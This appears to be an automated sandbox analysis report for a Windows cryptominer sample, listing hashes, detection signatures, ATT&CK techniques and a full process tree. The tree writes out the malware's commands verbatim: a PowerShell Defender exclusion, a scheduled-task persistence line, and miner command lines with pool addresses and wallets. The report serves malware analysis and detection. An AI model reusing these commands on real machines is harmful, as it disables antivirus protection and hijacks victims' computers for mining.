a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01

Analysis

max time kernel
271s
max time network
303s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
15-09-2022 10:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe
Size

861KB
MD5

e9e181f8c1c5f7a83c3833e8cb4097fd
SHA1

b39eba15f351c4e2f1097a421c7e0fc810911d1d
SHA256

a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01
SHA512

5cfb74bf0023a1f7d7ba3b892dd4ac0bb6ce249a1ff4c182e3075229ea843bd9eea48f9a6b30c98bf24b45c7148fd62c5a7675b68b8c176110c3fa351d1c2275
SSDEEP

6144:xqxcWSwdmsGPrGMdg3qA8YSweoxd8iHwrK6fJQuTDig/OnocA6DDmqcjlJUu+x0R:xqBSCBIwhxROKOquTZyPuYqcGbOqXZ

Score

9^/10

miner upx

Malware Config

Signatures

Detectes Phoenix Miner Payload 5 IoCs

miner

resource	yara_rule
behavioral1/memory/764-110-0x0000000140829C40-mapping.dmp	miner_phoenix
behavioral1/memory/764-114-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral1/memory/764-113-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral1/memory/764-115-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral1/memory/764-116-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix

Executes dropped EXE 1 IoCs

pid	Process
1704	DHUZT.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/764-106-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/764-108-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/764-109-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/764-111-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/764-112-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/764-114-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/764-113-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/764-115-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/764-116-0x0000000140000000-0x000000014082B000-memory.dmp	upx

Loads dropped DLL 1 IoCs

pid	Process
944	cmd.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
764	RegSvcs.exe
764	RegSvcs.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1704 set thread context of 1708	1704	DHUZT.exe	38
PID 1704 set thread context of 764	1704	DHUZT.exe	41

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1148	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1760	timeout.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1372	powershell.exe
1464	powershell.exe
1704	DHUZT.exe
1704	DHUZT.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1140	a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	1704	DHUZT.exe
Token: SeDebugPrivilege	1464	powershell.exe

Suspicious use of WriteProcessMemory 49 IoCs

description	pid	Process	procid_target
PID 1140 wrote to memory of 1372	1140	a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe	26
PID 1140 wrote to memory of 1372	1140	a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe	26
PID 1140 wrote to memory of 1372	1140	a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe	26
PID 1140 wrote to memory of 944	1140	a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe	28
PID 1140 wrote to memory of 944	1140	a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe	28
PID 1140 wrote to memory of 944	1140	a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe	28
PID 944 wrote to memory of 1760	944	cmd.exe	30
PID 944 wrote to memory of 1760	944	cmd.exe	30
PID 944 wrote to memory of 1760	944	cmd.exe	30
PID 944 wrote to memory of 1704	944	cmd.exe	31
PID 944 wrote to memory of 1704	944	cmd.exe	31
PID 944 wrote to memory of 1704	944	cmd.exe	31
PID 1704 wrote to memory of 1464	1704	DHUZT.exe	32
PID 1704 wrote to memory of 1464	1704	DHUZT.exe	32
PID 1704 wrote to memory of 1464	1704	DHUZT.exe	32
PID 1704 wrote to memory of 1316	1704	DHUZT.exe	34
PID 1704 wrote to memory of 1316	1704	DHUZT.exe	34
PID 1704 wrote to memory of 1316	1704	DHUZT.exe	34
PID 1316 wrote to memory of 1148	1316	cmd.exe	36
PID 1316 wrote to memory of 1148	1316	cmd.exe	36
PID 1316 wrote to memory of 1148	1316	cmd.exe	36
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1704 wrote to memory of 1708	1704	DHUZT.exe	38
PID 1708 wrote to memory of 560	1708	vbc.exe	39
PID 1708 wrote to memory of 560	1708	vbc.exe	39
PID 1708 wrote to memory of 560	1708	vbc.exe	39
PID 1704 wrote to memory of 764	1704	DHUZT.exe	41
PID 1704 wrote to memory of 764	1704	DHUZT.exe	41
PID 1704 wrote to memory of 764	1704	DHUZT.exe	41
PID 1704 wrote to memory of 764	1704	DHUZT.exe	41
PID 1704 wrote to memory of 764	1704	DHUZT.exe	41
PID 1704 wrote to memory of 764	1704	DHUZT.exe	41
PID 1704 wrote to memory of 764	1704	DHUZT.exe	41
PID 1976 wrote to memory of 1608	1976	taskeng.exe	43
PID 1976 wrote to memory of 1608	1976	taskeng.exe	43
PID 1976 wrote to memory of 1608	1976	taskeng.exe	43

C:\Users\Admin\AppData\Local\Temp\a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe
"C:\Users\Admin\AppData\Local\Temp\a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1372
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp340C.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:944
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1760
- - C:\ProgramData\ccl\DHUZT.exe
    "C:\ProgramData\ccl\DHUZT.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1464
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1316
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:1148
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.Vlad -p x -t 5
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1708
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:560
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0xD97F71F033a694e2b2FC8E7D615cdF742C65b2d3.VladHhh1 -coin etc -log 0
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:764

C:\Windows\system32\taskeng.exe
taskeng.exe {42C0E22C-3FBD-4475-B5F7-FB9260912550} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1976
- C:\ProgramData\ccl\DHUZT.exe
  C:\ProgramData\ccl\DHUZT.exe
  2⤵
  PID:1608

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ccl\DHUZT.exe

Filesize
861KB

MD5
e9e181f8c1c5f7a83c3833e8cb4097fd

SHA1
b39eba15f351c4e2f1097a421c7e0fc810911d1d

SHA256
a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01

SHA512
5cfb74bf0023a1f7d7ba3b892dd4ac0bb6ce249a1ff4c182e3075229ea843bd9eea48f9a6b30c98bf24b45c7148fd62c5a7675b68b8c176110c3fa351d1c2275

Download Submit
C:\ProgramData\ccl\DHUZT.exe

Filesize
861KB

MD5
e9e181f8c1c5f7a83c3833e8cb4097fd

SHA1
b39eba15f351c4e2f1097a421c7e0fc810911d1d

SHA256
a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01

SHA512
5cfb74bf0023a1f7d7ba3b892dd4ac0bb6ce249a1ff4c182e3075229ea843bd9eea48f9a6b30c98bf24b45c7148fd62c5a7675b68b8c176110c3fa351d1c2275

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp340C.tmp.bat

Filesize
137B

MD5
68124f040f246dd6dacc2ce7def21522

SHA1
8f32807fd4c917492739961330f56bd52a83c0dd

SHA256
34c8e729a39cef9abfc99017199758aff801838965d734699ce984113d8eb2a1

SHA512
69a3e277dce8d7f73eaf6d833081bc54672ea797273afd913e1157cee4d07570025aa8c383477edea7e438af1acc59994b88451a882cc4e59d0130cdf455a363

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d42ce1d0f6f8346659665ee519e24531

SHA1
a801e08fcf7d63b39110aa7893d2bc0b5090d43c

SHA256
89d362a0a4989acafa290612a175db22d57a9538050b405819b17849013a19c1

SHA512
15551b1c53555ec8bafdd82d81ef5293a4720b3bbec9ca1083566b2523d1fcb14b6cefe17de4c4883df29813496d43401b7544cbd9090a284716b4cd69507a5d

Download Submit
\ProgramData\ccl\DHUZT.exe

Filesize
861KB

MD5
e9e181f8c1c5f7a83c3833e8cb4097fd

SHA1
b39eba15f351c4e2f1097a421c7e0fc810911d1d

SHA256
a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01

SHA512
5cfb74bf0023a1f7d7ba3b892dd4ac0bb6ce249a1ff4c182e3075229ea843bd9eea48f9a6b30c98bf24b45c7148fd62c5a7675b68b8c176110c3fa351d1c2275

Download Submit
memory/560-102-0x0000000000000000-mapping.dmp

Download
memory/764-111-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/764-114-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/764-109-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/764-110-0x0000000140829C40-mapping.dmp

Download
memory/764-116-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/764-106-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/764-112-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/764-108-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/764-113-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/764-115-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/764-105-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/944-57-0x0000000000000000-mapping.dmp

Download
memory/1140-54-0x0000000001340000-0x000000000141C000-memory.dmp

Filesize
880KB

Download
memory/1148-77-0x0000000000000000-mapping.dmp

Download
memory/1316-75-0x0000000000000000-mapping.dmp

Download
memory/1372-63-0x000000001B710000-0x000000001BA0F000-memory.dmp

Filesize
3.0MB

Download
memory/1372-55-0x0000000000000000-mapping.dmp

Download
memory/1372-70-0x00000000026AB000-0x00000000026CA000-memory.dmp

Filesize
124KB

Download
memory/1372-56-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp

Filesize
8KB

Download
memory/1372-60-0x000007FEF4B40000-0x000007FEF5563000-memory.dmp

Filesize
10.1MB

Download
memory/1372-62-0x00000000026A4000-0x00000000026A7000-memory.dmp

Filesize
12KB

Download
memory/1372-61-0x000007FEF3FE0000-0x000007FEF4B3D000-memory.dmp

Filesize
11.4MB

Download
memory/1372-69-0x00000000026A4000-0x00000000026A7000-memory.dmp

Filesize
12KB

Download
memory/1464-80-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

Filesize
3.0MB

Download
memory/1464-79-0x00000000024E4000-0x00000000024E7000-memory.dmp

Filesize
12KB

Download
memory/1464-82-0x00000000024EB000-0x000000000250A000-memory.dmp

Filesize
124KB

Download
memory/1464-71-0x0000000000000000-mapping.dmp

Download
memory/1464-78-0x000007FEEB760000-0x000007FEEC2BD000-memory.dmp

Filesize
11.4MB

Download
memory/1464-76-0x000007FEEC2C0000-0x000007FEECCE3000-memory.dmp

Filesize
10.1MB

Download
memory/1464-81-0x00000000024E4000-0x00000000024E7000-memory.dmp

Filesize
12KB

Download
memory/1608-117-0x0000000000000000-mapping.dmp

Download
memory/1704-65-0x0000000000000000-mapping.dmp

Download
memory/1704-68-0x00000000010A0000-0x000000000117C000-memory.dmp

Filesize
880KB

Download
memory/1708-86-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1708-101-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1708-103-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1708-104-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1708-98-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1708-99-0x000000014006EE80-mapping.dmp

Download
memory/1708-97-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1708-95-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1708-94-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1708-93-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1708-92-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1708-91-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1708-89-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1708-88-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1708-84-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1708-83-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1760-59-0x0000000000000000-mapping.dmp

Download